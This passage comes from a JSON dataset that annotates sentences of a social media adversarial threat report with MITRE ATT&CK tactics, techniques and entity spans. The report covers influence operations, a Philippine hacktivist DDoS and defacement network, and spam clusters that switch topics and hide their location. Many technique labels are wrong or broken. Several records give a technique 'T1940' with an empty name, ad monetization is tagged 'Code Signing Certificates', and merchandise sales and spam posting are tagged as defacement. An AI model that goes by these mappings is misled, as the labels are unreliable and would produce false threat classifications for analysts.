"end": 21, "label": "ThreatActor" }, { "text": "Arabic-language journalist Groups", "start": 96, "end": 129, "label": "Infrastructure_Indicator" }, { "text": " solicit freelance help to write articles about Syria", "start": 30, "end": 83, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p15-s125-2072a0", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 15, "sentence_id": 125, "context_before": "First, this operation tried to solicit freelance help to write articles about Syria through the Arabic-language journalist Groups.", "sentence_text": "We’re notifying people who we believe have been contacted by this network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p15-s126-b50fd8", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 15, "sentence_id": 126, "context_before": "We’re notifying people who we believe have been contacted by this network.", "sentence_text": "ADVERSARIAL THREAT REPORT 15", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p16-s127-97537c", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 16, "sentence_id": 127, "context_before": "ADVERSARIAL THREAT REPORT 15", "sentence_text": "We found this activity as part of our internal investigation into suspected coordinated inauthentic behavior with links to the activity we had disrupted in August 2020.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p16-s128-ff1a00", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 16, "sentence_id": 128, "context_before": "We found this activity as part of our internal investigation into suspected coordinated inauthentic behavior with links to the activity we had disrupted in August 2020.", "sentence_text": "Although the people behind it attempted to conceal their identities and coordination, our investigation found links to individuals associated with the past activity by the Russian Internet Research Agency.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "attempted to conceal their identities and coordination", "entities": [ { "text": " the people behind it ", "start": 8, "end": 30, "label": "ThreatActor" }, { "text": "Russian Internet Research Agency", "start": 172, "end": 204, "label": "ThreatActor" }, { "text": "attempted to conceal their identities", "start": 30, "end": 67, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p16-s129-1c0767", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 16, "sentence_id": 129, "context_before": "Although the people behind it attempted to conceal their identities and coordination, our investigation found links to individuals associated with the past activity by the Russian Internet Research Agency.", "sentence_text": "● PresenceonFacebook: three Facebook accounts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p16-s130-86a7aa", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 16, "sentence_id": 130, "context_before": "● PresenceonFacebook: three Facebook accounts.", "sentence_text": "ADVERSARIAL THREAT REPORT 16", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p17-s132-cbc343", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 17, "sentence_id": 132, "context_before": "Russia", "sentence_text": "We removed a network of about 200 accounts operated from Russia.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p17-s133-a48a1f", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 17, "sentence_id": 133, "context_before": "We removed a network of about 200 accounts operated from Russia.", "sentence_text": "Many of this network’s accounts were detected and disabled by our automated systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p17-s134-e85157", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 17, "sentence_id": 134, "context_before": "Many of this network’s accounts were detected and disabled by our automated systems.", "sentence_text": "Their coordinated reporting increased in mid-February, just before the invasion of Ukraine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p17-s135-813ab1", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 17, "sentence_id": 135, "context_before": "Their coordinated reporting increased in mid-February, just before the invasion of Ukraine.", "sentence_text": "We found this network as a result of our internal investigation into suspected inauthentic behavior in the region.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p17-s136-e32139", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 17, "sentence_id": 136, "context_before": "We found this network as a result of our internal investigation into suspected inauthentic behavior in the region.", "sentence_text": "Our review identified limited links between this activity and a network from Russia that we took down for CIB in 2019.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p17-s137-83655e", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 17, "sentence_id": 137, "context_before": "Our review identified limited links between this activity and a network from Russia that we took down for CIB in 2019.", "sentence_text": "ADVERSARIAL THREAT REPORT 17", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p18-s138-a4a4fc", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 18, "sentence_id": 138, "context_before": "ADVERSARIAL THREAT REPORT 17", "sentence_text": "Removing a coordinated violating network in the Philippines We remove coordinated violating networks when we find people — whether they use authentic or fake accounts — working together to violate or evade our Community Standards.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p18-s139-4b5fda", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 18, "sentence_id": 139, "context_before": "Removing a coordinated violating network in the Philippines We remove coordinated violating networks when we find people — whether they use authentic or fake accounts — working together to violate or evade our Community Standards.", "sentence_text": "In these cases, the potential for harm caused by the totality of the network’s activity exceeds the impact of each individual post or account.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p18-s140-93004b", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 18, "sentence_id": 140, "context_before": "In these cases, the potential for harm caused by the totality of the network’s activity exceeds the impact of each individual post or account.", "sentence_text": "The people behind this activity claimed to be hacktivists and relied primarily on authentic and duplicate accounts to post and amplify content about Distributed Denial of Service (DDoS)\nattacks, account recovery and defacing and compromising of websites in the Philippines.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p18-s141-61e57e", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 18, "sentence_id": 141, "context_before": "The people behind this activity claimed to be hacktivists and relied primarily on authentic and duplicate accounts to post and amplify content about Distributed Denial of Service (DDoS)\nattacks, account recovery and defacing and compromising of websites in the Philippines.", "sentence_text": "They commented about a DDoS attack against the sites of the Nobel Prize in December 2021 which ADVERSARIAL THREAT REPORT 18", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1499", "name": "Endpoint Denial of Service" } ], "procedure": "commented about a DDoS attack against the sites of the Nobel prize", "entities": [ { "text": "They ", "start": 0, "end": 5, "label": "ThreatActor" }, { "text": "sites of the Nobel Prize ", "start": 47, "end": 72, "label": "Infrastructure_Indicator" }, { "text": "commented about a DDoS attack", "start": 5, "end": 34, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p19-s142-0d825b", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 19, "sentence_id": 142, "context_before": "They commented about a DDoS attack against the sites of the Nobel Prize in December 2021 which ADVERSARIAL THREAT REPORT 18", "sentence_text": "was confirmed to be unsuccessful, and accused public figures in the Philippines of being Communists (a tactic known as “red-tagging”).", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1940", "name": "" } ], "procedure": "accused public figures in the Philippines of being Communists (red-tagging)", "entities": [ { "text": "accused public figures in the Philippines of being Communists (a tactic known as “red-tagging”).", "start": 38, "end": 134, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p19-s143-3e8014", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 19, "sentence_id": 143, "context_before": "was confirmed to be unsuccessful, and accused public figures in the Philippines of being Communists (a tactic known as “red-tagging”).", "sentence_text": "This network claimed credit for bringing websites down and defacing them, primarily those of news entities.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1491.002", "name": "External Defacement" } ], "procedure": "claimed credit for taking websites offline and defacing them", "entities": [ { "text": "This network", "start": 0, "end": 12, "label": "ThreatActor" }, { "text": "websites", "start": 41, "end": 49, "label": "Infrastructure_Indicator" }, { "text": "claimed credit for bringing websites down ", "start": 13, "end": 55, "label": "Action" }, { "text": "defacing them", "start": 59, "end": 72, "label": "Action" }, { "text": "news entities", "start": 93, "end": 106, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-82_mitre_report-p19-s144-b5375d", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 19, "sentence_id": 144, "context_before": "This network claimed credit for bringing websites down and defacing them, primarily those of news entities.", "sentence_text": "They also offered cyber security services to protect websites from attacks, like the ones they themselves claimed to have perpetrated.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1940", "name": "" } ], "procedure": "claimed to have perpetrated attacks", "entities": [ { "text": "They", "start": 0, "end": 4, "label": "ThreatActor" }, { "text": "websites ", "start": 53, "end": 62, "label": "Infrastructure_Indicator" }, { "text": "offered cyber security services to protect websites from attacks", "start": 10, "end": 74, "label": "Action" }, { "text": "claimed to have perpetrated", "start": 106, "end": 133, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p19-s145-ed2ce2", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 19, "sentence_id": 145, "context_before": "They also offered cyber security services to protect websites from attacks, like the ones they themselves claimed to have perpetrated.", "sentence_text": "Finally, this group publicly invited new members to join and carry out DDoS attacks.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1588.005", "name": "Exploits" } ], "procedure": "publicly invited new members to join and carry out DDos attacks", "entities": [ { "text": "this group", "start": 9, "end": 19, "label": "ThreatActor" }, { "text": "publicly invited new members to join", "start": 20, "end": 56, "label": "Action" }, { "text": "carry out DDoS attacks", "start": 61, "end": 83, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p19-s146-81fca6", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 19, "sentence_id": 146, "context_before": "Finally, this group publicly invited new members to join and carry out DDoS attacks.", "sentence_text": "ADVERSARIAL THREAT REPORT 19", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p20-s147-119184", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 20, "sentence_id": 147, "context_before": "ADVERSARIAL THREAT REPORT 19", "sentence_text": "Removing inauthentic behavior What is Inauthentic Behavior?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p20-s148-0ec3fe", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 20, "sentence_id": 148, "context_before": "Removing inauthentic behavior What is Inauthentic Behavior?", "sentence_text": "While CIB is typically designed to mislead people about who is behind an operation to manipulate public debate for a strategic goal, Inauthentic Behavior (IB) is primarily centered around amplifying and increasing the distribution of content.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p20-s149-81547e", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 20, "sentence_id": 149, "context_before": "While CIB is typically designed to mislead people about who is behind an operation to manipulate public debate for a strategic goal, Inauthentic Behavior (IB) is primarily centered around amplifying and increasing the distribution of content.", "sentence_text": "It is often (but not exclusively) financially motivated, and shares many tactics with spam and scam activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p20-s150-2a406d", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 20, "sentence_id": 150, "context_before": "It is often (but not exclusively) financially motivated, and shares many tactics with spam and scam activity.", "sentence_text": "How do we enforce against IB?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p20-s151-124db4", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 20, "sentence_id": 151, "context_before": "How do we enforce against IB?", "sentence_text": "IB operators typically focus on quantity, rather than the quality of engagement.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p20-s152-90e328", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 20, "sentence_id": 152, "context_before": "IB operators typically focus on quantity, rather than the quality of engagement.", "sentence_text": "For example, they may use large numbers of low-sophistication fake accounts to mass-post their content or to like it.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "used large numbers of low-sophistication fake accounts to mass-post their content or to like it", "entities": [ { "text": "fake accounts", "start": 62, "end": 75, "label": "Infrastructure_Indicator" }, { "text": "use large numbers of low-sophistication fake accounts to mass-post their content or to like it", "start": 22, "end": 116, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p20-s153-e95ef1", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 20, "sentence_id": 153, "context_before": "For example, they may use large numbers of low-sophistication fake accounts to mass-post their content or to like it.", "sentence_text": "They may also try to monetize people’s attention by either driving them to off-platform websites filled with ads or selling t-shirts and other goods.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.002", "name": "Code Signing Certificates" } ], "procedure": "monetized attention by driving traffic to ad-filled websites and selling merchandise", "entities": [ { "text": "They", "start": 0, "end": 4, "label": "ThreatActor" }, { "text": "off-platform websites", "start": 75, "end": 96, "label": "Infrastructure_Indicator" }, { "text": "try to monetize", "start": 14, "end": 29, "label": "Action" }, { "text": "driving them to off-platform websites", "start": 59, "end": 96, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p20-s154-9c08c6", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 20, "sentence_id": 154, "context_before": "They may also try to monetize people’s attention by either driving them to off-platform websites filled with ads or selling t-shirts and other goods.", "sentence_text": "In response to detection and removals, they typically try to aggressively reconstitute their activity.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1136.002", "name": "Domain Account" } ], "procedure": "tried to aggressively reconstitute their activity in response to detection and removals", "entities": [ { "text": "they ", "start": 39, "end": 44, "label": "ThreatActor" }, { "text": "detection and removals", "start": 15, "end": 37, "label": "Action" }, { "text": "try to aggressively reconstitute their activity.", "start": 54, "end": 102, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p20-s155-e33a31", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 20, "sentence_id": 155, "context_before": "In response to detection and removals, they typically try to aggressively reconstitute their activity.", "sentence_text": "Here are some of the deceptive strategies we’ve seen IB operators use to artificially boost their engagement:\nADVERSARIAL THREAT REPORT 20", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p21-s156-cf69aa", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 21, "sentence_id": 156, "context_before": "Here are some of the deceptive strategies we’ve seen IB operators use to artificially boost their engagement:\nADVERSARIAL THREAT REPORT 20", "sentence_text": "Context switching\nIB operators often seek to mislead and grow their audience by claiming to be dedicated to one popular topic, then switching to another unrelated one when it becomes viral.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "mislead audience by falsely claiming dedication to a topic and switching to another when viral", "entities": [ { "text": "IB operators", "start": 18, "end": 30, "label": "ThreatActor" }, { "text": "seek to mislead", "start": 37, "end": 52, "label": "Action" }, { "text": "claiming to be dedicated to one popular topic", "start": 80, "end": 125, "label": "Action" }, { "text": "switching to another unrelated one when it becomes viral", "start": 132, "end": 188, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p21-s157-30b667", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 21, "sentence_id": 157, "context_before": "Context switching\nIB operators often seek to mislead and grow their audience by claiming to be dedicated to one popular topic, then switching to another unrelated one when it becomes viral.", "sentence_text": "They are well-attuned to their target audiences and will quickly pivot to post about the latest news or scandals to deceive people into clicking links to their sites.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p21-s158-ffeae4", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 21, "sentence_id": 158, "context_before": "They are well-attuned to their target audiences and will quickly pivot to post about the latest news or scandals to deceive people into clicking links to their sites.", "sentence_text": "Unsurprisingly, politics has also become a common spammy lure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p21-s159-6cbec3", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 21, "sentence_id": 159, "context_before": "Unsurprisingly, politics has also become a common spammy lure.", "sentence_text": "They attempted to monetize, including by selling thematic merchandise through their website.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1491.002", "name": "External Defacement" } ], "procedure": "attempted to monetize by selling thematic merchandise through their website", "entities": [ { "text": "They", "start": 0, "end": 4, "label": "ThreatActor" }, { "text": "their website", "start": 78, "end": 91, "label": "Infrastructure_Indicator" }, { "text": "attempted to monetize", "start": 5, "end": 26, "label": "Action" }, { "text": "selling thematic merchandise through their website", "start": 41, "end": 91, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p21-s160-56a152", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 21, "sentence_id": 160, "context_before": "They attempted to monetize, including by selling thematic merchandise through their website.", "sentence_text": "After the Russian invasion began, this cluster quickly switched from posting about “scary driving” and “Airsoft videos'' to military themes.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "shifted content themes to military topics", "entities": [ { "text": "this cluster", "start": 34, "end": 46, "label": "ThreatActor" }, { "text": "quickly switched from posting about “scary driving” and “Airsoft videos'' to military themes", "start": 47, "end": 139, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p21-s161-7e7eec", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 21, "sentence_id": 161, "context_before": "After the Russian invasion began, this cluster quickly switched from posting about “scary driving” and “Airsoft videos'' to military themes.", "sentence_text": "In another case, we took down a Page run from Vietnam that shifted from posting videos about “life hacks” and jewelry to posting about military hardware and the Ukraine conflict — all to drive people towards an off-platform website.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "shifted content themes to drive people to an off-platform website", "entities": [ { "text": "off-platform website", "start": 211, "end": 231, "label": "Infrastructure_Indicator" }, { "text": "shifted from posting videos about “life hacks” and jewelry to posting about military hardware and the Ukraine conflict", "start": 59, "end": 177, "label": "Action" }, { "text": "drive people towards an off-platform website", "start": 187, "end": 231, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p21-s162-a12b0a", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 21, "sentence_id": 162, "context_before": "In another case, we took down a Page run from Vietnam that shifted from posting videos about “life hacks” and jewelry to posting about military hardware and the Ukraine conflict — all to drive people towards an off-platform website.", "sentence_text": "Posing as authentic communities in different countries IB networks also often pretend to be based in one country, when in fact they’re operated out of a completely different one.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "pretended to be based in one country while operating from another", "entities": [ { "text": "IB networks ", "start": 55, "end": 67, "label": "ThreatActor" }, { "text": "pretend to be based in one country, when in fact they’re operated out of a completely different one", "start": 78, "end": 177, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p21-s163-147d20", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 21, "sentence_id": 163, "context_before": "Posing as authentic communities in different countries IB networks also often pretend to be based in one country, when in fact they’re operated out of a completely different one.", "sentence_text": "This tactic often goes hand in hand with the “context switching” we described above.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p21-s164-4bc74a", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 21, "sentence_id": 164, "context_before": "This tactic often goes hand in hand with the “context switching” we described above.", "sentence_text": "It includes foreign spammers and scammers flocking to any hot-button issue relevant in a particular country or region — like an election or socio-political crisis or natural disaster — to amass an audience and monetize their attention.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.002", "name": "Code Signing Certificates" } ], "procedure": "exploited hot-button issues to grow an audience and monetize attention", "entities": [ { "text": "foreign spammers and scammers", "start": 12, "end": 41, "label": "ThreatActor" }, { "text": "flocking to any hot-button issue relevant in a particular country or region — like an election or socio-political crisis or natural disaster — to amass an audience and monetize their attention.", "start": 42, "end": 235, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p21-s165-602dc8", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 21, "sentence_id": 165, "context_before": "It includes foreign spammers and scammers flocking to any hot-button issue relevant in a particular country or region — like an election or socio-political crisis or natural disaster — to amass an audience and monetize their attention.", "sentence_text": "For example, multiple Vietnam- and Bangladesh-based spam clusters posed as supporters of the Canadian Trucker Convoy to cash in on people’s interest in this protest.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p21-s166-08b2c3", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 21, "sentence_id": 166, "context_before": "For example, multiple Vietnam- and Bangladesh-based spam clusters posed as supporters of the Canadian Trucker Convoy to cash in on people’s interest in this protest.", "sentence_text": "ADVERSARIAL THREAT REPORT 21", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p22-s167-90f133", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 22, "sentence_id": 167, "context_before": "ADVERSARIAL THREAT REPORT 21", "sentence_text": "These amplification clusters often manifest as an engagement “bubble” or “click clique”, where only its own members like and comment on each other’s posts instead of real people outside that bubble.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "created an artificial engagement bubble by liking and commenting on each other's posts", "entities": [ { "text": "These amplification clusters", "start": 0, "end": 28, "label": "ThreatActor" }, { "text": "manifest as an engagement “bubble” or “click clique”,", "start": 35, "end": 88, "label": "Action" }, { "text": "its own members like and comment on each other’s posts instead of real people outside that bubble", "start": 100, "end": 197, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p22-s168-31d794", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 22, "sentence_id": 168, "context_before": "These amplification clusters often manifest as an engagement “bubble” or “click clique”, where only its own members like and comment on each other’s posts instead of real people outside that bubble.", "sentence_text": "They appeared to focus on growing their audiences for either eventual monetization or to make their clients’ content appear more popular than it really is.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" }, { "id": "T1491.002", "name": "External Defacement" } ], "procedure": "manipulated audience size and content popularity for monetization", "entities": [ { "text": "They", "start": 0, "end": 4, "label": "ThreatActor" }, { "text": " growing their audiences for either eventual monetization or to make their clients’ content appear more popular than it really is", "start": 25, "end": 154, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p22-s169-962955", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 22, "sentence_id": 169, "context_before": "They appeared to focus on growing their audiences for either eventual monetization or to make their clients’ content appear more popular than it really is.", "sentence_text": "Context switching\nWe’ve removed several clusters of activity that switched the focus of their Pages and Groups to the elections as they attempted to increase their following.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" }, { "id": "T1491.002", "name": "External Defacement" } ], "procedure": "shifted the focus of their pages and groups to election content to grow their following", "entities": [ { "text": "Pages and Groups", "start": 94, "end": 110, "label": "Infrastructure_Indicator" }, { "text": "Context switching", "start": 0, "end": 17, "label": "Action" }, { "text": "switched the focus of their Pages and Groups to the elections", "start": 66, "end": 127, "label": "Action" }, { "text": "attempted to increase their following", "start": 136, "end": 173, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p22-s170-9003aa", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 22, "sentence_id": 170, "context_before": "Context switching\nWe’ve removed several clusters of activity that switched the focus of their Pages and Groups to the elections as they attempted to increase their following.", "sentence_text": "One Page that mainly shared non-political dance videos renamed itself to become “Bongbong Marcos news,” while another Page that started off as supporting a politician later changed its name to “Your Financial Answer” and began posting loan advice.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "renamed pages from non-political content to political news and financial advice", "entities": [ { "text": "Bongbong Marcos news", "start": 81, "end": 101, "label": "Infrastructure_Indicator" }, { "text": "One Page ", "start": 0, "end": 9, "label": "Infrastructure_Indicator" }, { "text": "another Page", "start": 110, "end": 122, "label": "Infrastructure_Indicator" }, { "text": "Your Financial Answer", "start": 194, "end": 215, "label": "Infrastructure_Indicator" }, { "text": "renamed itself to become “Bongbong Marcos news,”", "start": 55, "end": 103, "label": "Action" }, { "text": "changed its name to “Your Financial Answer” and began posting loan advice", "start": 173, "end": 246, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p22-s171-224655", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 22, "sentence_id": 171, "context_before": "One Page that mainly shared non-political dance videos renamed itself to become “Bongbong Marcos news,” while another Page that started off as supporting a politician later changed its name to “Your Financial Answer” and began posting loan advice.", "sentence_text": "ADVERSARIAL THREAT REPORT 22", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p23-s172-12eb91", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 23, "sentence_id": 172, "context_before": "ADVERSARIAL THREAT REPORT 22", "sentence_text": "In February, we identified a cluster of Pages operated by spammers in Vietnam who used VPNs to make it look like they are based in the Philippines.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "used VPns to make it look like they are based in the Philippines", "entities": [ { "text": "spammers in Vietnam", "start": 58, "end": 77, "label": "ThreatActor" }, { "text": "VPNs", "start": 87, "end": 91, "label": "MalwareTool" }, { "text": "cluster of Pages ", "start": 29, "end": 46, "label": "Infrastructure_Indicator" }, { "text": "sed VPNs to make it look like they are based in the Philippines", "start": 83, "end": 146, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p23-s173-064492", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 23, "sentence_id": 173, "context_before": "In February, we identified a cluster of Pages operated by spammers in Vietnam who used VPNs to make it look like they are based in the Philippines.", "sentence_text": "They claimed to share live footage while purporting to be local news sources on the ground in an attempt to drive people to their clickbait websites filled with ads.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "claimed to share live footage while purporting to be local news sources on the ground to drive people to clickbait websites filled with ads", "entities": [ { "text": "They", "start": 0, "end": 4, "label": "ThreatActor" }, { "text": "clickbait websites filled with ads", "start": 130, "end": 164, "label": "Infrastructure_Indicator" }, { "text": "claimed to share live footage", "start": 5, "end": 34, "label": "Action" }, { "text": "purporting to be local news sources on the ground", "start": 41, "end": 90, "label": "Action" }, { "text": "drive people to their clickbait websites filled with ads", "start": 108, "end": 164, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p23-s174-1a5bca", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 23, "sentence_id": 174, "context_before": "They claimed to share live footage while purporting to be local news sources on the ground in an attempt to drive people to their clickbait websites filled with ads.", "sentence_text": "Inauthentic engagement", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p23-s175-535e1c", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 23, "sentence_id": 175, "context_before": "Inauthentic engagement", "sentence_text": "We identified several efforts to post at high, spam-like rates to drive people to particular Pages or off-platform websites.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1491", "name": "Defacement" } ], "procedure": "posted at high, spam like rates to drive people to particular pages or off-platform websites", "entities": [ { "text": " particular Pages or off-platform websites", "start": 81, "end": 123, "label": "Infrastructure_Indicator" }, { "text": "post at high, spam-like rates", "start": 33, "end": 62, "label": "Action" }, { "text": "drive people to particular Pages or off-platform websites", "start": 66, "end": 123, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p23-s176-8e8b85", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 23, "sentence_id": 176, "context_before": "We identified several efforts to post at high, spam-like rates to drive people to particular Pages or off-platform websites.", "sentence_text": "In one case, we found a social media management agency that used fake accounts and duplicate Pages to inauthentically amplify both political and entertainment content.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" }, { "id": "T1491.002", "name": "External Defacement" } ], "procedure": "used fake accounts and duplicate pages to make amplification appear authentic", "entities": [ { "text": "a social media management agency", "start": 22, "end": 54, "label": "ThreatActor" }, { "text": "fake accounts and duplicate Pages", "start": 65, "end": 98, 